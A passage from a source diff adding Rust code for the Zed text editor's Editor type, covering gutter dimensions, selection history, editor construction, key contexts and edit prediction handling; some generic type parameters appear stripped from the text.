placeholder_text: Option>, + is_focused: bool, + scroll_anchor: ScrollAnchor, + ongoing_scroll: OngoingScroll, + current_line_highlight: CurrentLineHighlight, + gutter_hovered: bool, +} + +#[derive(Default, Debug, Clone, Copy)] +pub struct GutterDimensions { + pub left_padding: Pixels, + pub right_padding: Pixels, + pub width: Pixels, + pub margin: Pixels, + pub git_blame_entries_width: Option, +} + +impl GutterDimensions { + /// The full width of the space taken up by the gutter. + pub fn full_width(&self) -> Pixels { + self.margin + self.width + } + + /// The width of the space reserved for the fold indicators, + /// use alongside 'justify_end' and `gutter_width` to + /// right align content with the line numbers + pub fn fold_area_width(&self) -> Pixels { + self.margin + self.right_padding + } +} + +#[derive(Debug)] +pub struct RemoteSelection { + pub replica_id: ReplicaId, + pub selection: Selection, + pub cursor_shape: CursorShape, + pub peer_id: PeerId, + pub line_mode: bool, + pub participant_index: Option, + pub user_name: Option, +} + +#[derive(Clone, Debug)] +struct SelectionHistoryEntry { + selections: Arc<[Selection]>, + select_next_state: Option, + select_prev_state: Option, + add_selections_state: Option, +} + +enum SelectionHistoryMode { + Normal, + Undoing, + Redoing, +} + +#[derive(Clone, PartialEq, Eq, Hash)] +struct HoveredCursor { + replica_id: u16, + selection_id: usize, +} + +impl Default for SelectionHistoryMode { + fn default() -> Self { + Self::Normal + } +} + +#[derive(Default)] +struct SelectionHistory { + #[allow(clippy::type_complexity)] + selections_by_transaction: + HashMap]>, Option]>>)>, + mode: SelectionHistoryMode, + undo_stack: VecDeque, + redo_stack: VecDeque, +} + +impl SelectionHistory { + fn insert_transaction( + &mut self, + transaction_id: TransactionId, + selections: Arc<[Selection]>, + ) { + self.selections_by_transaction + .insert(transaction_id, (selections, None)); + } + + #[allow(clippy::type_complexity)] + fn 
transaction( + &self, + transaction_id: TransactionId, + ) -> Option<&(Arc<[Selection]>, Option]>>)> { + self.selections_by_transaction.get(&transaction_id) + } + + #[allow(clippy::type_complexity)] + fn transaction_mut( + &mut self, + transaction_id: TransactionId, + ) -> Option<&mut (Arc<[Selection]>, Option]>>)> { + self.selections_by_transaction.get_mut(&transaction_id) + } + + fn push(&mut self, entry: SelectionHistoryEntry) { + if !entry.selections.is_empty() { + match self.mode { + SelectionHistoryMode::Normal => { + self.push_undo(entry); + self.redo_stack.clear(); + } + SelectionHistoryMode::Undoing => self.push_redo(entry), + SelectionHistoryMode::Redoing => self.push_undo(entry), + } + } + } + + fn push_undo(&mut self, entry: SelectionHistoryEntry) { + if self + .undo_stack + .back() + .map_or(true, |e| e.selections != entry.selections) + { + self.undo_stack.push_back(entry); + if self.undo_stack.len() > MAX_SELECTION_HISTORY_LEN { + self.undo_stack.pop_front(); + } + } + } + + fn push_redo(&mut self, entry: SelectionHistoryEntry) { + if self + .redo_stack + .back() + .map_or(true, |e| e.selections != entry.selections) + { + self.redo_stack.push_back(entry); + if self.redo_stack.len() > MAX_SELECTION_HISTORY_LEN { + self.redo_stack.pop_front(); + } + } + } +} + +#[derive(Clone, Copy)] +pub struct RowHighlightOptions { + pub autoscroll: bool, + pub include_gutter: bool, +} + +impl Default for RowHighlightOptions { + fn default() -> Self { + Self { + autoscroll: Default::default(), + include_gutter: true, + } + } +} + +struct RowHighlight { + index: usize, + range: Range, + color: Hsla, + options: RowHighlightOptions, + type_id: TypeId, +} + +#[derive(Clone, Debug)] +struct AddSelectionsState { + above: bool, + stack: Vec, +} + +#[derive(Clone)] +struct SelectNextState { + query: AhoCorasick, + wordwise: bool, + done: bool, +} + +impl std::fmt::Debug for SelectNextState { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + 
f.debug_struct(std::any::type_name::()) + .field("wordwise", &self.wordwise) + .field("done", &self.done) + .finish() + } +} + +#[derive(Debug)] +struct AutocloseRegion { + selection_id: usize, + range: Range, + pair: BracketPair, +} + +#[derive(Debug)] +struct SnippetState { + ranges: Vec>>, + active_index: usize, + choices: Vec>>, +} + +#[doc(hidden)] +pub struct RenameState { + pub range: Range, + pub old_name: Arc, + pub editor: Entity, + block_id: CustomBlockId, +} + +struct InvalidationStack(Vec); + +struct RegisteredInlineCompletionProvider { + provider: Arc, + _subscription: Subscription, +} + +#[derive(Debug, PartialEq, Eq)] +pub struct ActiveDiagnosticGroup { + pub active_range: Range, + pub active_message: String, + pub group_id: usize, + pub blocks: HashSet, +} + +#[derive(Debug, PartialEq, Eq)] + +pub(crate) enum ActiveDiagnostic { + None, + All, + Group(ActiveDiagnosticGroup), +} + +#[derive(Serialize, Deserialize, Clone, Debug)] +pub struct ClipboardSelection { + /// The number of bytes in this selection. + pub len: usize, + /// Whether this was a full-line selection. + pub is_entire_line: bool, + /// The indentation of the first line when this content was originally copied. 
+ pub first_line_indent: u32, +} + +// selections, scroll behavior, was newest selection reversed +type SelectSyntaxNodeHistoryState = ( + Box<[Selection]>, + SelectSyntaxNodeScrollBehavior, + bool, +); + +#[derive(Default)] +struct SelectSyntaxNodeHistory { + stack: Vec, + // disable temporarily to allow changing selections without losing the stack + pub disable_clearing: bool, +} + +impl SelectSyntaxNodeHistory { + pub fn try_clear(&mut self) { + if !self.disable_clearing { + self.stack.clear(); + } + } + + pub fn push(&mut self, selection: SelectSyntaxNodeHistoryState) { + self.stack.push(selection); + } + + pub fn pop(&mut self) -> Option { + self.stack.pop() + } +} + +enum SelectSyntaxNodeScrollBehavior { + CursorTop, + FitSelection, + CursorBottom, +} + +#[derive(Debug)] +pub(crate) struct NavigationData { + cursor_anchor: Anchor, + cursor_position: Point, + scroll_anchor: ScrollAnchor, + scroll_top_row: u32, +} + +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum GotoDefinitionKind { + Symbol, + Declaration, + Type, + Implementation, +} + +#[derive(Debug, Clone)] +enum InlayHintRefreshReason { + ModifiersChanged(bool), + Toggle(bool), + SettingsChange(InlayHintSettings), + NewLinesShown, + BufferEdited(HashSet>), + RefreshRequested, + ExcerptsRemoved(Vec), +} + +impl InlayHintRefreshReason { + fn description(&self) -> &'static str { + match self { + Self::ModifiersChanged(_) => "modifiers changed", + Self::Toggle(_) => "toggle", + Self::SettingsChange(_) => "settings change", + Self::NewLinesShown => "new lines shown", + Self::BufferEdited(_) => "buffer edited", + Self::RefreshRequested => "refresh requested", + Self::ExcerptsRemoved(_) => "excerpts removed", + } + } +} + +pub enum FormatTarget { + Buffers, + Ranges(Vec>), +} + +pub(crate) struct FocusedBlock { + id: BlockId, + focus_handle: WeakFocusHandle, +} + +#[derive(Clone)] +enum JumpData { + MultiBufferRow { + row: MultiBufferRow, + line_offset_from_top: u32, + }, + MultiBufferPoint { + 
excerpt_id: ExcerptId, + position: Point, + anchor: text::Anchor, + line_offset_from_top: u32, + }, +} + +pub enum MultibufferSelectionMode { + First, + All, +} + +#[derive(Clone, Copy, Debug, Default)] +pub struct RewrapOptions { + pub override_language_settings: bool, + pub preserve_existing_whitespace: bool, +} + +impl Editor { + pub fn single_line(window: &mut Window, cx: &mut Context) -> Self { + let buffer = cx.new(|cx| Buffer::local("", cx)); + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + Self::new( + EditorMode::SingleLine { auto_width: false }, + buffer, + None, + window, + cx, + ) + } + + pub fn multi_line(window: &mut Window, cx: &mut Context) -> Self { + let buffer = cx.new(|cx| Buffer::local("", cx)); + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + Self::new(EditorMode::full(), buffer, None, window, cx) + } + + pub fn auto_width(window: &mut Window, cx: &mut Context) -> Self { + let buffer = cx.new(|cx| Buffer::local("", cx)); + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + Self::new( + EditorMode::SingleLine { auto_width: true }, + buffer, + None, + window, + cx, + ) + } + + pub fn auto_height(max_lines: usize, window: &mut Window, cx: &mut Context) -> Self { + let buffer = cx.new(|cx| Buffer::local("", cx)); + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + Self::new( + EditorMode::AutoHeight { max_lines }, + buffer, + None, + window, + cx, + ) + } + + pub fn for_buffer( + buffer: Entity, + project: Option>, + window: &mut Window, + cx: &mut Context, + ) -> Self { + let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); + Self::new(EditorMode::full(), buffer, project, window, cx) + } + + pub fn for_multibuffer( + buffer: Entity, + project: Option>, + window: &mut Window, + cx: &mut Context, + ) -> Self { + Self::new(EditorMode::full(), buffer, project, window, cx) + } + + pub fn clone(&self, window: &mut Window, cx: &mut Context) -> Self { + let mut clone = Self::new( + 
self.mode, + self.buffer.clone(), + self.project.clone(), + window, + cx, + ); + self.display_map.update(cx, |display_map, cx| { + let snapshot = display_map.snapshot(cx); + clone.display_map.update(cx, |display_map, cx| { + display_map.set_state(&snapshot, cx); + }); + }); + clone.folds_did_change(cx); + clone.selections.clone_state(&self.selections); + clone.scroll_manager.clone_state(&self.scroll_manager); + clone.searchable = self.searchable; + clone.read_only = self.read_only; + clone + } + + pub fn new( + mode: EditorMode, + buffer: Entity, + project: Option>, + window: &mut Window, + cx: &mut Context, + ) -> Self { + let style = window.text_style(); + let font_size = style.font_size.to_pixels(window.rem_size()); + let editor = cx.entity().downgrade(); + let fold_placeholder = FoldPlaceholder { + constrain_width: true, + render: Arc::new(move |fold_id, fold_range, cx| { + let editor = editor.clone(); + div() + .id(fold_id) + .bg(cx.theme().colors().ghost_element_background) + .hover(|style| style.bg(cx.theme().colors().ghost_element_hover)) + .active(|style| style.bg(cx.theme().colors().ghost_element_active)) + .rounded_xs() + .size_full() + .cursor_pointer() + .child("⋯") + .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation()) + .on_click(move |_, _window, cx| { + editor + .update(cx, |editor, cx| { + editor.unfold_ranges( + &[fold_range.start..fold_range.end], + true, + false, + cx, + ); + cx.stop_propagation(); + }) + .ok(); + }) + .into_any() + }), + merge_adjacent: true, + ..Default::default() + }; + let display_map = cx.new(|cx| { + DisplayMap::new( + buffer.clone(), + style.font(), + font_size, + None, + FILE_HEADER_HEIGHT, + MULTI_BUFFER_EXCERPT_HEADER_HEIGHT, + fold_placeholder, + cx, + ) + }); + + let selections = SelectionsCollection::new(display_map.clone(), buffer.clone()); + + let blink_manager = cx.new(|cx| BlinkManager::new(CURSOR_BLINK_INTERVAL, cx)); + + let soft_wrap_mode_override = matches!(mode, EditorMode::SingleLine { .. 
}) + .then(|| language_settings::SoftWrap::None); + + let mut project_subscriptions = Vec::new(); + if mode.is_full() { + if let Some(project) = project.as_ref() { + project_subscriptions.push(cx.subscribe_in( + project, + window, + |editor, _, event, window, cx| match event { + project::Event::RefreshCodeLens => { + // we always query lens with actions, without storing them, always refreshing them + } + project::Event::RefreshInlayHints => { + editor + .refresh_inlay_hints(InlayHintRefreshReason::RefreshRequested, cx); + } + project::Event::SnippetEdit(id, snippet_edits) => { + if let Some(buffer) = editor.buffer.read(cx).buffer(*id) { + let focus_handle = editor.focus_handle(cx); + if focus_handle.is_focused(window) { + let snapshot = buffer.read(cx).snapshot(); + for (range, snippet) in snippet_edits { + let editor_range = + language::range_from_lsp(*range).to_offset(&snapshot); + editor + .insert_snippet( + &[editor_range], + snippet.clone(), + window, + cx, + ) + .ok(); + } + } + } + } + _ => {} + }, + )); + if let Some(task_inventory) = project + .read(cx) + .task_store() + .read(cx) + .task_inventory() + .cloned() + { + project_subscriptions.push(cx.observe_in( + &task_inventory, + window, + |editor, _, window, cx| { + editor.tasks_update_task = Some(editor.refresh_runnables(window, cx)); + }, + )); + }; + + project_subscriptions.push(cx.subscribe_in( + &project.read(cx).breakpoint_store(), + window, + |editor, _, event, window, cx| match event { + BreakpointStoreEvent::ClearDebugLines => { + editor.clear_row_highlights::(); + editor.refresh_inline_values(cx); + } + BreakpointStoreEvent::SetDebugLine => { + if editor.go_to_active_debug_line(window, cx) { + cx.stop_propagation(); + } + + editor.refresh_inline_values(cx); + } + _ => {} + }, + )); + } + } + + let buffer_snapshot = buffer.read(cx).snapshot(cx); + + let inlay_hint_settings = + inlay_hint_settings(selections.newest_anchor().head(), &buffer_snapshot, cx); + let focus_handle = cx.focus_handle(); + 
cx.on_focus(&focus_handle, window, Self::handle_focus) + .detach(); + cx.on_focus_in(&focus_handle, window, Self::handle_focus_in) + .detach(); + cx.on_focus_out(&focus_handle, window, Self::handle_focus_out) + .detach(); + cx.on_blur(&focus_handle, window, Self::handle_blur) + .detach(); + + let show_indent_guides = if matches!(mode, EditorMode::SingleLine { .. }) { + Some(false) + } else { + None + }; + + let breakpoint_store = match (mode, project.as_ref()) { + (EditorMode::Full { .. }, Some(project)) => Some(project.read(cx).breakpoint_store()), + _ => None, + }; + + let mut code_action_providers = Vec::new(); + let mut load_uncommitted_diff = None; + if let Some(project) = project.clone() { + load_uncommitted_diff = Some( + get_uncommitted_diff_for_buffer( + &project, + buffer.read(cx).all_buffers(), + buffer.clone(), + cx, + ) + .shared(), + ); + code_action_providers.push(Rc::new(project) as Rc<_>); + } + + let mut this = Self { + focus_handle, + show_cursor_when_unfocused: false, + last_focused_descendant: None, + buffer: buffer.clone(), + display_map: display_map.clone(), + selections, + scroll_manager: ScrollManager::new(cx), + columnar_selection_tail: None, + add_selections_state: None, + select_next_state: None, + select_prev_state: None, + selection_history: Default::default(), + autoclose_regions: Default::default(), + snippet_stack: Default::default(), + select_syntax_node_history: SelectSyntaxNodeHistory::default(), + ime_transaction: Default::default(), + active_diagnostics: ActiveDiagnostic::None, + show_inline_diagnostics: ProjectSettings::get_global(cx).diagnostics.inline.enabled, + inline_diagnostics_update: Task::ready(()), + inline_diagnostics: Vec::new(), + soft_wrap_mode_override, + hard_wrap: None, + completion_provider: project.clone().map(|project| Box::new(project) as _), + semantics_provider: project.clone().map(|project| Rc::new(project) as _), + collaboration_hub: project.clone().map(|project| Box::new(project) as _), + project, + 
blink_manager: blink_manager.clone(), + show_local_selections: true, + show_scrollbars: true, + disable_scrolling: false, + mode, + show_breadcrumbs: EditorSettings::get_global(cx).toolbar.breadcrumbs, + show_gutter: mode.is_full(), + show_line_numbers: None, + use_relative_line_numbers: None, + disable_expand_excerpt_buttons: false, + show_git_diff_gutter: None, + show_code_actions: None, + show_runnables: None, + show_breakpoints: None, + show_wrap_guides: None, + show_indent_guides, + placeholder_text: None, + highlight_order: 0, + highlighted_rows: HashMap::default(), + background_highlights: Default::default(), + gutter_highlights: TreeMap::default(), + scrollbar_marker_state: ScrollbarMarkerState::default(), + active_indent_guides_state: ActiveIndentGuidesState::default(), + nav_history: None, + context_menu: RefCell::new(None), + context_menu_options: None, + mouse_context_menu: None, + completion_tasks: Default::default(), + inline_blame_popover: Default::default(), + signature_help_state: SignatureHelpState::default(), + auto_signature_help: None, + find_all_references_task_sources: Vec::new(), + next_completion_id: 0, + next_inlay_id: 0, + code_action_providers, + available_code_actions: Default::default(), + code_actions_task: Default::default(), + quick_selection_highlight_task: Default::default(), + debounced_selection_highlight_task: Default::default(), + document_highlights_task: Default::default(), + linked_editing_range_task: Default::default(), + pending_rename: Default::default(), + searchable: true, + cursor_shape: EditorSettings::get_global(cx) + .cursor_shape + .unwrap_or_default(), + current_line_highlight: None, + autoindent_mode: Some(AutoindentMode::EachLine), + collapse_matches: false, + workspace: None, + input_enabled: true, + use_modal_editing: mode.is_full(), + read_only: false, + use_autoclose: true, + use_auto_surround: true, + auto_replace_emoji_shortcode: false, + jsx_tag_auto_close_enabled_in_any_buffer: false, + leader_peer_id: 
None, + remote_id: None, + hover_state: Default::default(), + pending_mouse_down: None, + hovered_link_state: Default::default(), + edit_prediction_provider: None, + active_inline_completion: None, + stale_inline_completion_in_menu: None, + edit_prediction_preview: EditPredictionPreview::Inactive { + released_too_fast: false, + }, + inline_diagnostics_enabled: mode.is_full(), + inline_value_cache: InlineValueCache::new(inlay_hint_settings.show_value_hints), + inlay_hint_cache: InlayHintCache::new(inlay_hint_settings), + + gutter_hovered: false, + pixel_position_of_newest_cursor: None, + last_bounds: None, + last_position_map: None, + expect_bounds_change: None, + gutter_dimensions: GutterDimensions::default(), + style: None, + show_cursor_names: false, + hovered_cursors: Default::default(), + next_editor_action_id: EditorActionId::default(), + editor_actions: Rc::default(), + inline_completions_hidden_for_vim_mode: false, + show_inline_completions_override: None, + menu_inline_completions_policy: MenuInlineCompletionsPolicy::ByProvider, + edit_prediction_settings: EditPredictionSettings::Disabled, + edit_prediction_indent_conflict: false, + edit_prediction_requires_modifier_in_indent_conflict: true, + custom_context_menu: None, + show_git_blame_gutter: false, + show_git_blame_inline: false, + show_selection_menu: None, + show_git_blame_inline_delay_task: None, + git_blame_inline_enabled: ProjectSettings::get_global(cx).git.inline_blame_enabled(), + render_diff_hunk_controls: Arc::new(render_diff_hunk_controls), + serialize_dirty_buffers: ProjectSettings::get_global(cx) + .session + .restore_unsaved_buffers, + blame: None, + blame_subscription: None, + tasks: Default::default(), + + breakpoint_store, + gutter_breakpoint_indicator: (None, None), + _subscriptions: vec![ + cx.observe(&buffer, Self::on_buffer_changed), + cx.subscribe_in(&buffer, window, Self::on_buffer_event), + cx.observe_in(&display_map, window, Self::on_display_map_changed), + 
cx.observe(&blink_manager, |_, _, cx| cx.notify()), + cx.observe_global_in::(window, Self::settings_changed), + observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), + cx.observe_window_activation(window, |editor, window, cx| { + let active = window.is_window_active(); + editor.blink_manager.update(cx, |blink_manager, cx| { + if active { + blink_manager.enable(cx); + } else { + blink_manager.disable(cx); + } + }); + }), + ], + tasks_update_task: None, + linked_edit_ranges: Default::default(), + in_project_search: false, + previous_search_ranges: None, + breadcrumb_header: None, + focused_block: None, + next_scroll_position: NextScrollCursorCenterTopBottom::default(), + addons: HashMap::default(), + registered_buffers: HashMap::default(), + _scroll_cursor_center_top_bottom_task: Task::ready(()), + selection_mark_mode: false, + toggle_fold_multiple_buffers: Task::ready(()), + serialize_selections: Task::ready(()), + serialize_folds: Task::ready(()), + text_style_refinement: None, + load_diff_task: load_uncommitted_diff, + mouse_cursor_hidden: false, + hide_mouse_mode: EditorSettings::get_global(cx) + .hide_mouse + .unwrap_or_default(), + change_list: ChangeList::new(), + }; + if let Some(breakpoints) = this.breakpoint_store.as_ref() { + this._subscriptions + .push(cx.observe(breakpoints, |_, _, cx| { + cx.notify(); + })); + } + this.tasks_update_task = Some(this.refresh_runnables(window, cx)); + this._subscriptions.extend(project_subscriptions); + + this._subscriptions.push(cx.subscribe_in( + &cx.entity(), + window, + |editor, _, e: &EditorEvent, window, cx| match e { + EditorEvent::ScrollPositionChanged { local, .. 
} => { + if *local { + let new_anchor = editor.scroll_manager.anchor(); + let snapshot = editor.snapshot(window, cx); + editor.update_restoration_data(cx, move |data| { + data.scroll_position = ( + new_anchor.top_row(&snapshot.buffer_snapshot), + new_anchor.offset, + ); + }); + editor.hide_signature_help(cx, SignatureHelpHiddenBy::Escape); + editor.inline_blame_popover.take(); + } + } + EditorEvent::Edited { .. } => { + if !vim_enabled(cx) { + let (map, selections) = editor.selections.all_adjusted_display(cx); + let pop_state = editor + .change_list + .last() + .map(|previous| { + previous.len() == selections.len() + && previous.iter().enumerate().all(|(ix, p)| { + p.to_display_point(&map).row() + == selections[ix].head().row() + }) + }) + .unwrap_or(false); + let new_positions = selections + .into_iter() + .map(|s| map.display_point_to_anchor(s.head(), Bias::Left)) + .collect(); + editor + .change_list + .push_to_change_list(pop_state, new_positions); + } + } + _ => (), + }, + )); + + if let Some(dap_store) = this + .project + .as_ref() + .map(|project| project.read(cx).dap_store()) + { + let weak_editor = cx.weak_entity(); + + this._subscriptions + .push( + cx.observe_new::(move |_, _, cx| { + let session_entity = cx.entity(); + weak_editor + .update(cx, |editor, cx| { + editor._subscriptions.push( + cx.subscribe(&session_entity, Self::on_debug_session_event), + ); + }) + .ok(); + }), + ); + + for session in dap_store.read(cx).sessions().cloned().collect::>() { + this._subscriptions + .push(cx.subscribe(&session, Self::on_debug_session_event)); + } + } + + this.end_selection(window, cx); + this.scroll_manager.show_scrollbars(window, cx); + jsx_tag_auto_close::refresh_enabled_in_any_buffer(&mut this, &buffer, cx); + + if mode.is_full() { + let should_auto_hide_scrollbars = cx.should_auto_hide_scrollbars(); + cx.set_global(ScrollbarAutoHide(should_auto_hide_scrollbars)); + + if this.git_blame_inline_enabled { + this.git_blame_inline_enabled = true; + 
this.start_git_blame_inline(false, window, cx); + } + + this.go_to_active_debug_line(window, cx); + + if let Some(buffer) = buffer.read(cx).as_singleton() { + if let Some(project) = this.project.as_ref() { + let handle = project.update(cx, |project, cx| { + project.register_buffer_with_language_servers(&buffer, cx) + }); + this.registered_buffers + .insert(buffer.read(cx).remote_id(), handle); + } + } + } + + this.report_editor_event("Editor Opened", None, cx); + this + } + + pub fn deploy_mouse_context_menu( + &mut self, + position: gpui::Point, + context_menu: Entity, + window: &mut Window, + cx: &mut Context, + ) { + self.mouse_context_menu = Some(MouseContextMenu::new( + self, + crate::mouse_context_menu::MenuPosition::PinnedToScreen(position), + context_menu, + window, + cx, + )); + } + + pub fn mouse_menu_is_focused(&self, window: &Window, cx: &App) -> bool { + self.mouse_context_menu + .as_ref() + .is_some_and(|menu| menu.context_menu.focus_handle(cx).is_focused(window)) + } + + fn key_context(&self, window: &Window, cx: &App) -> KeyContext { + self.key_context_internal(self.has_active_inline_completion(), window, cx) + } + + fn key_context_internal( + &self, + has_active_edit_prediction: bool, + window: &Window, + cx: &App, + ) -> KeyContext { + let mut key_context = KeyContext::new_with_defaults(); + key_context.add("Editor"); + let mode = match self.mode { + EditorMode::SingleLine { .. } => "single_line", + EditorMode::AutoHeight { .. } => "auto_height", + EditorMode::Full { .. 
} => "full", + }; + + if EditorSettings::jupyter_enabled(cx) { + key_context.add("jupyter"); + } + + key_context.set("mode", mode); + if self.pending_rename.is_some() { + key_context.add("renaming"); + } + + match self.context_menu.borrow().as_ref() { + Some(CodeContextMenu::Completions(_)) => { + key_context.add("menu"); + key_context.add("showing_completions"); + } + Some(CodeContextMenu::CodeActions(_)) => { + key_context.add("menu"); + key_context.add("showing_code_actions") + } + None => {} + } + + // Disable vim contexts when a sub-editor (e.g. rename/inline assistant) is focused. + if !self.focus_handle(cx).contains_focused(window, cx) + || (self.is_focused(window) || self.mouse_menu_is_focused(window, cx)) + { + for addon in self.addons.values() { + addon.extend_key_context(&mut key_context, cx) + } + } + + if let Some(singleton_buffer) = self.buffer.read(cx).as_singleton() { + if let Some(extension) = singleton_buffer + .read(cx) + .file() + .and_then(|file| file.path().extension()?.to_str()) + { + key_context.set("extension", extension.to_string()); + } + } else { + key_context.add("multibuffer"); + } + + if has_active_edit_prediction { + if self.edit_prediction_in_conflict() { + key_context.add(EDIT_PREDICTION_CONFLICT_KEY_CONTEXT); + } else { + key_context.add(EDIT_PREDICTION_KEY_CONTEXT); + key_context.add("copilot_suggestion"); + } + } + + if self.selection_mark_mode { + key_context.add("selection_mode"); + } + + key_context + } + + pub fn hide_mouse_cursor(&mut self, origin: &HideMouseCursorOrigin) { + self.mouse_cursor_hidden = match origin { + HideMouseCursorOrigin::TypingAction => { + matches!( + self.hide_mouse_mode, + HideMouseMode::OnTyping | HideMouseMode::OnTypingAndMovement + ) + } + HideMouseCursorOrigin::MovementAction => { + matches!(self.hide_mouse_mode, HideMouseMode::OnTypingAndMovement) + } + }; + } + + pub fn edit_prediction_in_conflict(&self) -> bool { + if !self.show_edit_predictions_in_menu() { + return false; + } + + let 
showing_completions = self + .context_menu + .borrow() + .as_ref() + .map_or(false, |context| { + matches!(context, CodeContextMenu::Completions(_)) + }); + + showing_completions + || self.edit_prediction_requires_modifier() + // Require modifier key when the cursor is on leading whitespace, to allow `tab` + // bindings to insert tab characters. + || (self.edit_prediction_requires_modifier_in_indent_conflict && self.edit_prediction_indent_conflict) + } + + pub fn accept_edit_prediction_keybind( + &self, + window: &Window, + cx: &App, + ) -> AcceptEditPredictionBinding { + let key_context = self.key_context_internal(true, window, cx); + let in_conflict = self.edit_prediction_in_conflict(); + + AcceptEditPredictionBinding( + window + .bindings_for_action_in_context(&AcceptEditPrediction, key_context) + .into_iter() + .filter(|binding| { + !in_conflict + || binding + .keystrokes() + .first() + .map_or(false, |keystroke| keystroke.modifiers.modified()) + }) + .rev() + .min_by_key(|binding| { + binding + .keystrokes() + .first() + .map_or(u8::MAX, |k| k.modifiers.number_of_modifiers()) + }), + ) + } + + pub fn new_file( + workspace: &mut Workspace, + _: &workspace::NewFile, + window: &mut Window, + cx: &mut Context, + ) { + Self::new_in_workspace(workspace, window, cx).detach_and_prompt_err( + "Failed to create buffer", + window, + cx, + |e, _, _| match e.error_code() { + ErrorCode::RemoteUpgradeRequired => Some(format!( + "The remote instance of Zed does not support this yet. 
It must be upgraded to {}", + e.error_tag("required").unwrap_or("the latest version") + )), + _ => None, + }, + ); + } + + pub fn new_in_workspace( + workspace: &mut Workspace, + window: &mut Window, + cx: &mut Context, + ) -> Task>> { + let project = workspace.project().clone(); + let create = project.update(cx, |project, cx| project.create_buffer(cx)); + + cx.spawn_in(window, async move |workspace, cx| { + let buffer = create.await?; + workspace.update_in(cx, |workspace, window, cx| { + let editor = + cx.new(|cx| Editor::for_buffer(buffer, Some(project.clone()), window, cx)); + workspace.add_item_to_active_pane(Box::new(editor.clone()), None, true, window, cx); + editor + }) + }) + } + + fn new_file_vertical( + workspace: &mut Workspace, + _: &workspace::NewFileSplitVertical, + window: &mut Window, + cx: &mut Context, + ) { + Self::new_file_in_direction(workspace, SplitDirection::vertical(cx), window, cx) + } + + fn new_file_horizontal( + workspace: &mut Workspace, + _: &workspace::NewFileSplitHorizontal, + window: &mut Window, + cx: &mut Context, + ) { + Self::new_file_in_direction(workspace, SplitDirection::horizontal(cx), window, cx) + } + + fn new_file_in_direction( + workspace: &mut Workspace, + direction: SplitDirection, + window: &mut Window, + cx: &mut Context, + ) { + let project = workspace.project().clone(); + let create = project.update(cx, |project, cx| project.create_buffer(cx)); + + cx.spawn_in(window, async move |workspace, cx| { + let buffer = create.await?; + workspace.update_in(cx, move |workspace, window, cx| { + workspace.split_item( + direction, + Box::new( + cx.new(|cx| Editor::for_buffer(buffer, Some(project.clone()), window, cx)), + ), + window, + cx, + ) + })?; + anyhow::Ok(()) + }) + .detach_and_prompt_err("Failed to create buffer", window, cx, |e, _, _| { + match e.error_code() { + ErrorCode::RemoteUpgradeRequired => Some(format!( + "The remote instance of Zed does not support this yet. 
It must be upgraded to {}", + e.error_tag("required").unwrap_or("the latest version") + )), + _ => None, + } + }); + } + + pub fn leader_peer_id(&self) -> Option { + self.leader_peer_id + } + + pub fn buffer(&self) -> &Entity { + &self.buffer + } + + pub fn workspace(&self) -> Option> { + self.workspace.as_ref()?.0.upgrade() + } + + pub fn title<'a>(&self, cx: &'a App) -> Cow<'a, str> { + self.buffer().read(cx).title(cx) + } + + pub fn snapshot(&self, window: &mut Window, cx: &mut App) -> EditorSnapshot { + let git_blame_gutter_max_author_length = self + .render_git_blame_gutter(cx) + .then(|| { + if let Some(blame) = self.blame.as_ref() { + let max_author_length = + blame.update(cx, |blame, cx| blame.max_author_length(cx)); + Some(max_author_length) + } else { + None + } + }) + .flatten(); + + EditorSnapshot { + mode: self.mode, + show_gutter: self.show_gutter, + show_line_numbers: self.show_line_numbers, + show_git_diff_gutter: self.show_git_diff_gutter, + show_code_actions: self.show_code_actions, + show_runnables: self.show_runnables, + show_breakpoints: self.show_breakpoints, + git_blame_gutter_max_author_length, + display_snapshot: self.display_map.update(cx, |map, cx| map.snapshot(cx)), + scroll_anchor: self.scroll_manager.anchor(), + ongoing_scroll: self.scroll_manager.ongoing_scroll(), + placeholder_text: self.placeholder_text.clone(), + is_focused: self.focus_handle.is_focused(window), + current_line_highlight: self + .current_line_highlight + .unwrap_or_else(|| EditorSettings::get_global(cx).current_line_highlight), + gutter_hovered: self.gutter_hovered, + } + } + + pub fn language_at(&self, point: T, cx: &App) -> Option> { + self.buffer.read(cx).language_at(point, cx) + } + + pub fn file_at(&self, point: T, cx: &App) -> Option> { + self.buffer.read(cx).read(cx).file_at(point).cloned() + } + + pub fn active_excerpt( + &self, + cx: &App, + ) -> Option<(ExcerptId, Entity, Range)> { + self.buffer + .read(cx) + 
.excerpt_containing(self.selections.newest_anchor().head(), cx) + } + + pub fn mode(&self) -> EditorMode { + self.mode + } + + pub fn set_mode(&mut self, mode: EditorMode) { + self.mode = mode; + } + + pub fn collaboration_hub(&self) -> Option<&dyn CollaborationHub> { + self.collaboration_hub.as_deref() + } + + pub fn set_collaboration_hub(&mut self, hub: Box) { + self.collaboration_hub = Some(hub); + } + + pub fn set_in_project_search(&mut self, in_project_search: bool) { + self.in_project_search = in_project_search; + } + + pub fn set_custom_context_menu( + &mut self, + f: impl 'static + + Fn( + &mut Self, + DisplayPoint, + &mut Window, + &mut Context, + ) -> Option>, + ) { + self.custom_context_menu = Some(Box::new(f)) + } + + pub fn set_completion_provider(&mut self, provider: Option>) { + self.completion_provider = provider; + } + + pub fn semantics_provider(&self) -> Option> { + self.semantics_provider.clone() + } + + pub fn set_semantics_provider(&mut self, provider: Option>) { + self.semantics_provider = provider; + } + + pub fn set_edit_prediction_provider( + &mut self, + provider: Option>, + window: &mut Window, + cx: &mut Context, + ) where + T: EditPredictionProvider, + { + self.edit_prediction_provider = + provider.map(|provider| RegisteredInlineCompletionProvider { + _subscription: cx.observe_in(&provider, window, |this, _, window, cx| { + if this.focus_handle.is_focused(window) { + this.update_visible_inline_completion(window, cx); + } + }), + provider: Arc::new(provider), + }); + self.update_edit_prediction_settings(cx); + self.refresh_inline_completion(false, false, window, cx); + } + + pub fn placeholder_text(&self) -> Option<&str> { + self.placeholder_text.as_deref() + } + + pub fn set_placeholder_text( + &mut self, + placeholder_text: impl Into>, + cx: &mut Context, + ) { 